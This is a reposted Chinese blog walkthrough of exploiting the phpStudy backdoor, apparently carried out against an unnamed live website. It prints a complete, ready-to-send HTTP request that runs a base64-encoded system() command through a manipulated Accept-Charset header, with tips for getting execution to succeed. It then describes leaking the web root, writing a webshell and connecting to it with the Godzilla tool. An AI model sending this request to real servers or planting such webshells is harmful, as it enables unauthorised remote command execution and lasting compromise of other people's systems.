返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >PhpStudy后门漏洞实战复现
  • 117
分享到

PhpStudy后门漏洞实战复现

安全web安全 2023-08-31 15:08:37 117人浏览 泡泡鱼
摘要

PHPstudy后门事件介绍 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源

PHPstudy后门事件介绍

2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三方鉴定机构对软件中的“后门”进行司法鉴定,鉴定结果是该“后门”文件具有控制计算机的功能,嫌疑人已通过该后门远程控制下载运行脚本实现收集用户个人信息。在2019年9月20日,网上爆出phpstudy存在“后门”。

漏洞影响版本

phpstudy 2016版PHP5.4.45和PHP5.2.17,phpstudy2018版php-5.2.17和php-5.4.45存在后门。

实战利用

漏洞测试

某网站测试过程访问Http://XXX/robots.txt发现存在多个禁止访问的目录文件。

User-agent: * Disallow: /plus/ad_js.phpDisallow: /plus/advancedsearch.phpDisallow: /plus/car.phpDisallow: /plus/carbuyaction.phpDisallow: /plus/shops_buyaction.phpDisallow: /plus/erraddsave.phpDisallow: /plus/posttocar.phpDisallow: /plus/disdls.phpDisallow: /plus/feedback_js.phpDisallow: /plus/mytag_js.phpDisallow: /plus/rss.phpDisallow: /plus/search.phpDisallow: /plus/recommend.phpDisallow: /plus/stow.phpDisallow: /plus/count.phpDisallow: /includeDisallow: /templets

访问/plus/carbuyaction.php文件并利用burp抓包进行测试。

在这里插入图片描述

发现网站搭建使用的是php-5.4.45,尝试phpstudy后门漏洞。

构造payload:

注: Accept-Encoding的gzip, deflate 中间的逗号后面的空格去掉,不然命令执行不成功。

Accept-Charset 后面就是要执行的命令, 需要进行base64编码(这个漏洞相当于是eval()函数的代码执行,所以如果要执行os系统命令的话还要用system)。

GET /plus/carbuyaction.php HTTP/1.1Host: XXXUser-Agent: Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/WEBp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip,deflateaccept-charset: c3lzdGVtKCd3aG9hbWknKTs=Connection: closeContent-Length: 2

在这里插入图片描述

直接命令执行成功,存在phpstudy后门漏洞。

写webshell

首先需要测试找到网站部署的路径,通过目录遍历发现一个php文件。

在这里插入图片描述

dede暴出网站路径。
在这里插入图片描述

同样利用命令执行写入webshell
在这里插入图片描述

哥斯拉连接成功。
在这里插入图片描述

来源地址:https://blog.csdn.net/weixin_42196211/article/details/127574002

--结束END--

本文标题: PhpStudy后门漏洞实战复现

本文链接: https://lsjlt.com/news/386036.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • PhpStudy后门漏洞实战复现
    phpstudy后门事件介绍 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源...
    99+
    2023-08-31
    安全 web安全
  • Phpstudy后门漏洞复现
    一、漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连...
    99+
    2023-09-05
    安全 php 开发语言 web安全
  • phpStudy poc漏洞复现以及漏洞修复办法
    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响...
    99+
    2023-06-03
  • PHP/8.1.0-dev 后门命令执行漏洞复现
    地址: 青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF 进入环境 没有发现什么点,目录扫描也没有结果,打开bp抓包  结合题目提示 题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。 ...
    99+
    2023-09-14
    php 安全 web安全
  • PHP-8.1.0-dev 后门命令执行漏洞复现
    PHP-8.1.0-dev 后门命令执行漏洞复现 文章目录 PHP-8.1.0-dev 后门命令执行漏洞复现1. 概述1.1 PHP1.2 漏洞简述1.4 影响范围1.5 漏洞详情 2. ...
    99+
    2023-09-02
    php 安全 web安全
  • 威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
    概述...
    99+
    2024-04-02
  • XSS漏洞总结和漏洞复现
    XSS漏洞总结和漏洞复现 XSS漏洞概述:类型一:反射型类型二:存储型类型三:DOM型 复现20字符短域名绕过一、安装BEEFhttps://blog.csdn.net/weixin_45...
    99+
    2023-09-28
    xss php 前端
  • 【文件上传漏洞】user.ini留后门
    一、什么是.user.ini? php.ini是php默认的配置文件。其中包含四种配置, 在PHP_INI_USER的配置项中,提到.user.ini。 这里作用解释如下: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 ...
    99+
    2023-09-03
    php 开发语言
  • CSRF漏洞复现
    目录标题 原理如何实现和xss区别危害CSRF实战(pikachu)dvwa靶场 CSRF(Cross Site Request Forgery)。跨站请求伪造 原理 攻击者会伪造一...
    99+
    2023-09-06
    csrf php 服务器
  • Nginx漏洞复现
    前言https://blog.csdn.net/weixin_58163202/article/details/ Nginx 是一款轻量级的 Web 服务器、反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个 BSD-li...
    99+
    2023-09-22
    nginx 前端 安全 Powered by 金山文档
  • Apache漏洞复现
    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability)漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715)漏洞防御 ...
    99+
    2023-09-01
    apache php 开发语言
  • 复现myucms v2.1.1022漏洞
    漏洞列表 漏洞类型复现任意文件上传√配置文件覆盖√任意文件上传2√跨站脚本漏洞√任意文件删除√任意文件下载√sql注入√ 复现漏洞 任意文件上传1 漏洞成因 展示位置: 代码位置: myucms-v...
    99+
    2023-09-17
    php 漏洞复现 渗透测试
  • [漏洞复现]Thinkphp RCE
    文章目录 简介影响版本复现文件包含目录穿越 修复 简介 Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参...
    99+
    2023-09-16
    php
  • vulhub-thinkphp漏洞复现
    vulhub-thinkphp漏洞复现 https://silentx.gitee.io/2022/09/06/thinkphp/ 一.ThinkPHP 2.x 任意代码执行漏洞 1.概述 漏洞...
    99+
    2023-09-21
    网络安全 php
  • ThinkPHP漏洞复现实例分析
    本篇内容主要讲解“ThinkPHP漏洞复现实例分析”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“ThinkPHP漏洞复现实例分析”吧!ThinkPHP1)简介ThinkPHP是一个免费开源的,快...
    99+
    2023-07-04
  • 帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
    文章目录 一、简述👋二、安装环境👋三、漏洞复现👋四、原理分析👋 一、简述👋 漏洞描述 EmpireCMS...
    99+
    2023-08-31
    php 安全 web安全
  • Nginx解析漏洞复现
    1、漏洞描述 版本信息: Nginx 1.x 最新版PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 2、漏洞原理 由于nginx.conf的如下配置导致nginx把以’.php’结尾的...
    99+
    2023-09-27
    安全
  • 通达oa漏洞复现 
    通达OAget_contactlist.php敏感信息泄露漏洞复现 漏洞描述 通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综...
    99+
    2023-09-16
    安全性测试 威胁分析 Powered by 金山文档
  • Nacos漏洞总结复现
     Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos {Hostname}}{Hostname}} User-Agent: Moz...
    99+
    2023-10-08
    安全 web安全 网络 java 开发语言
  • CVE-2022-30887漏洞复现
    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CM...
    99+
    2023-09-11
    php 开发语言 安全 网络 服务器
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作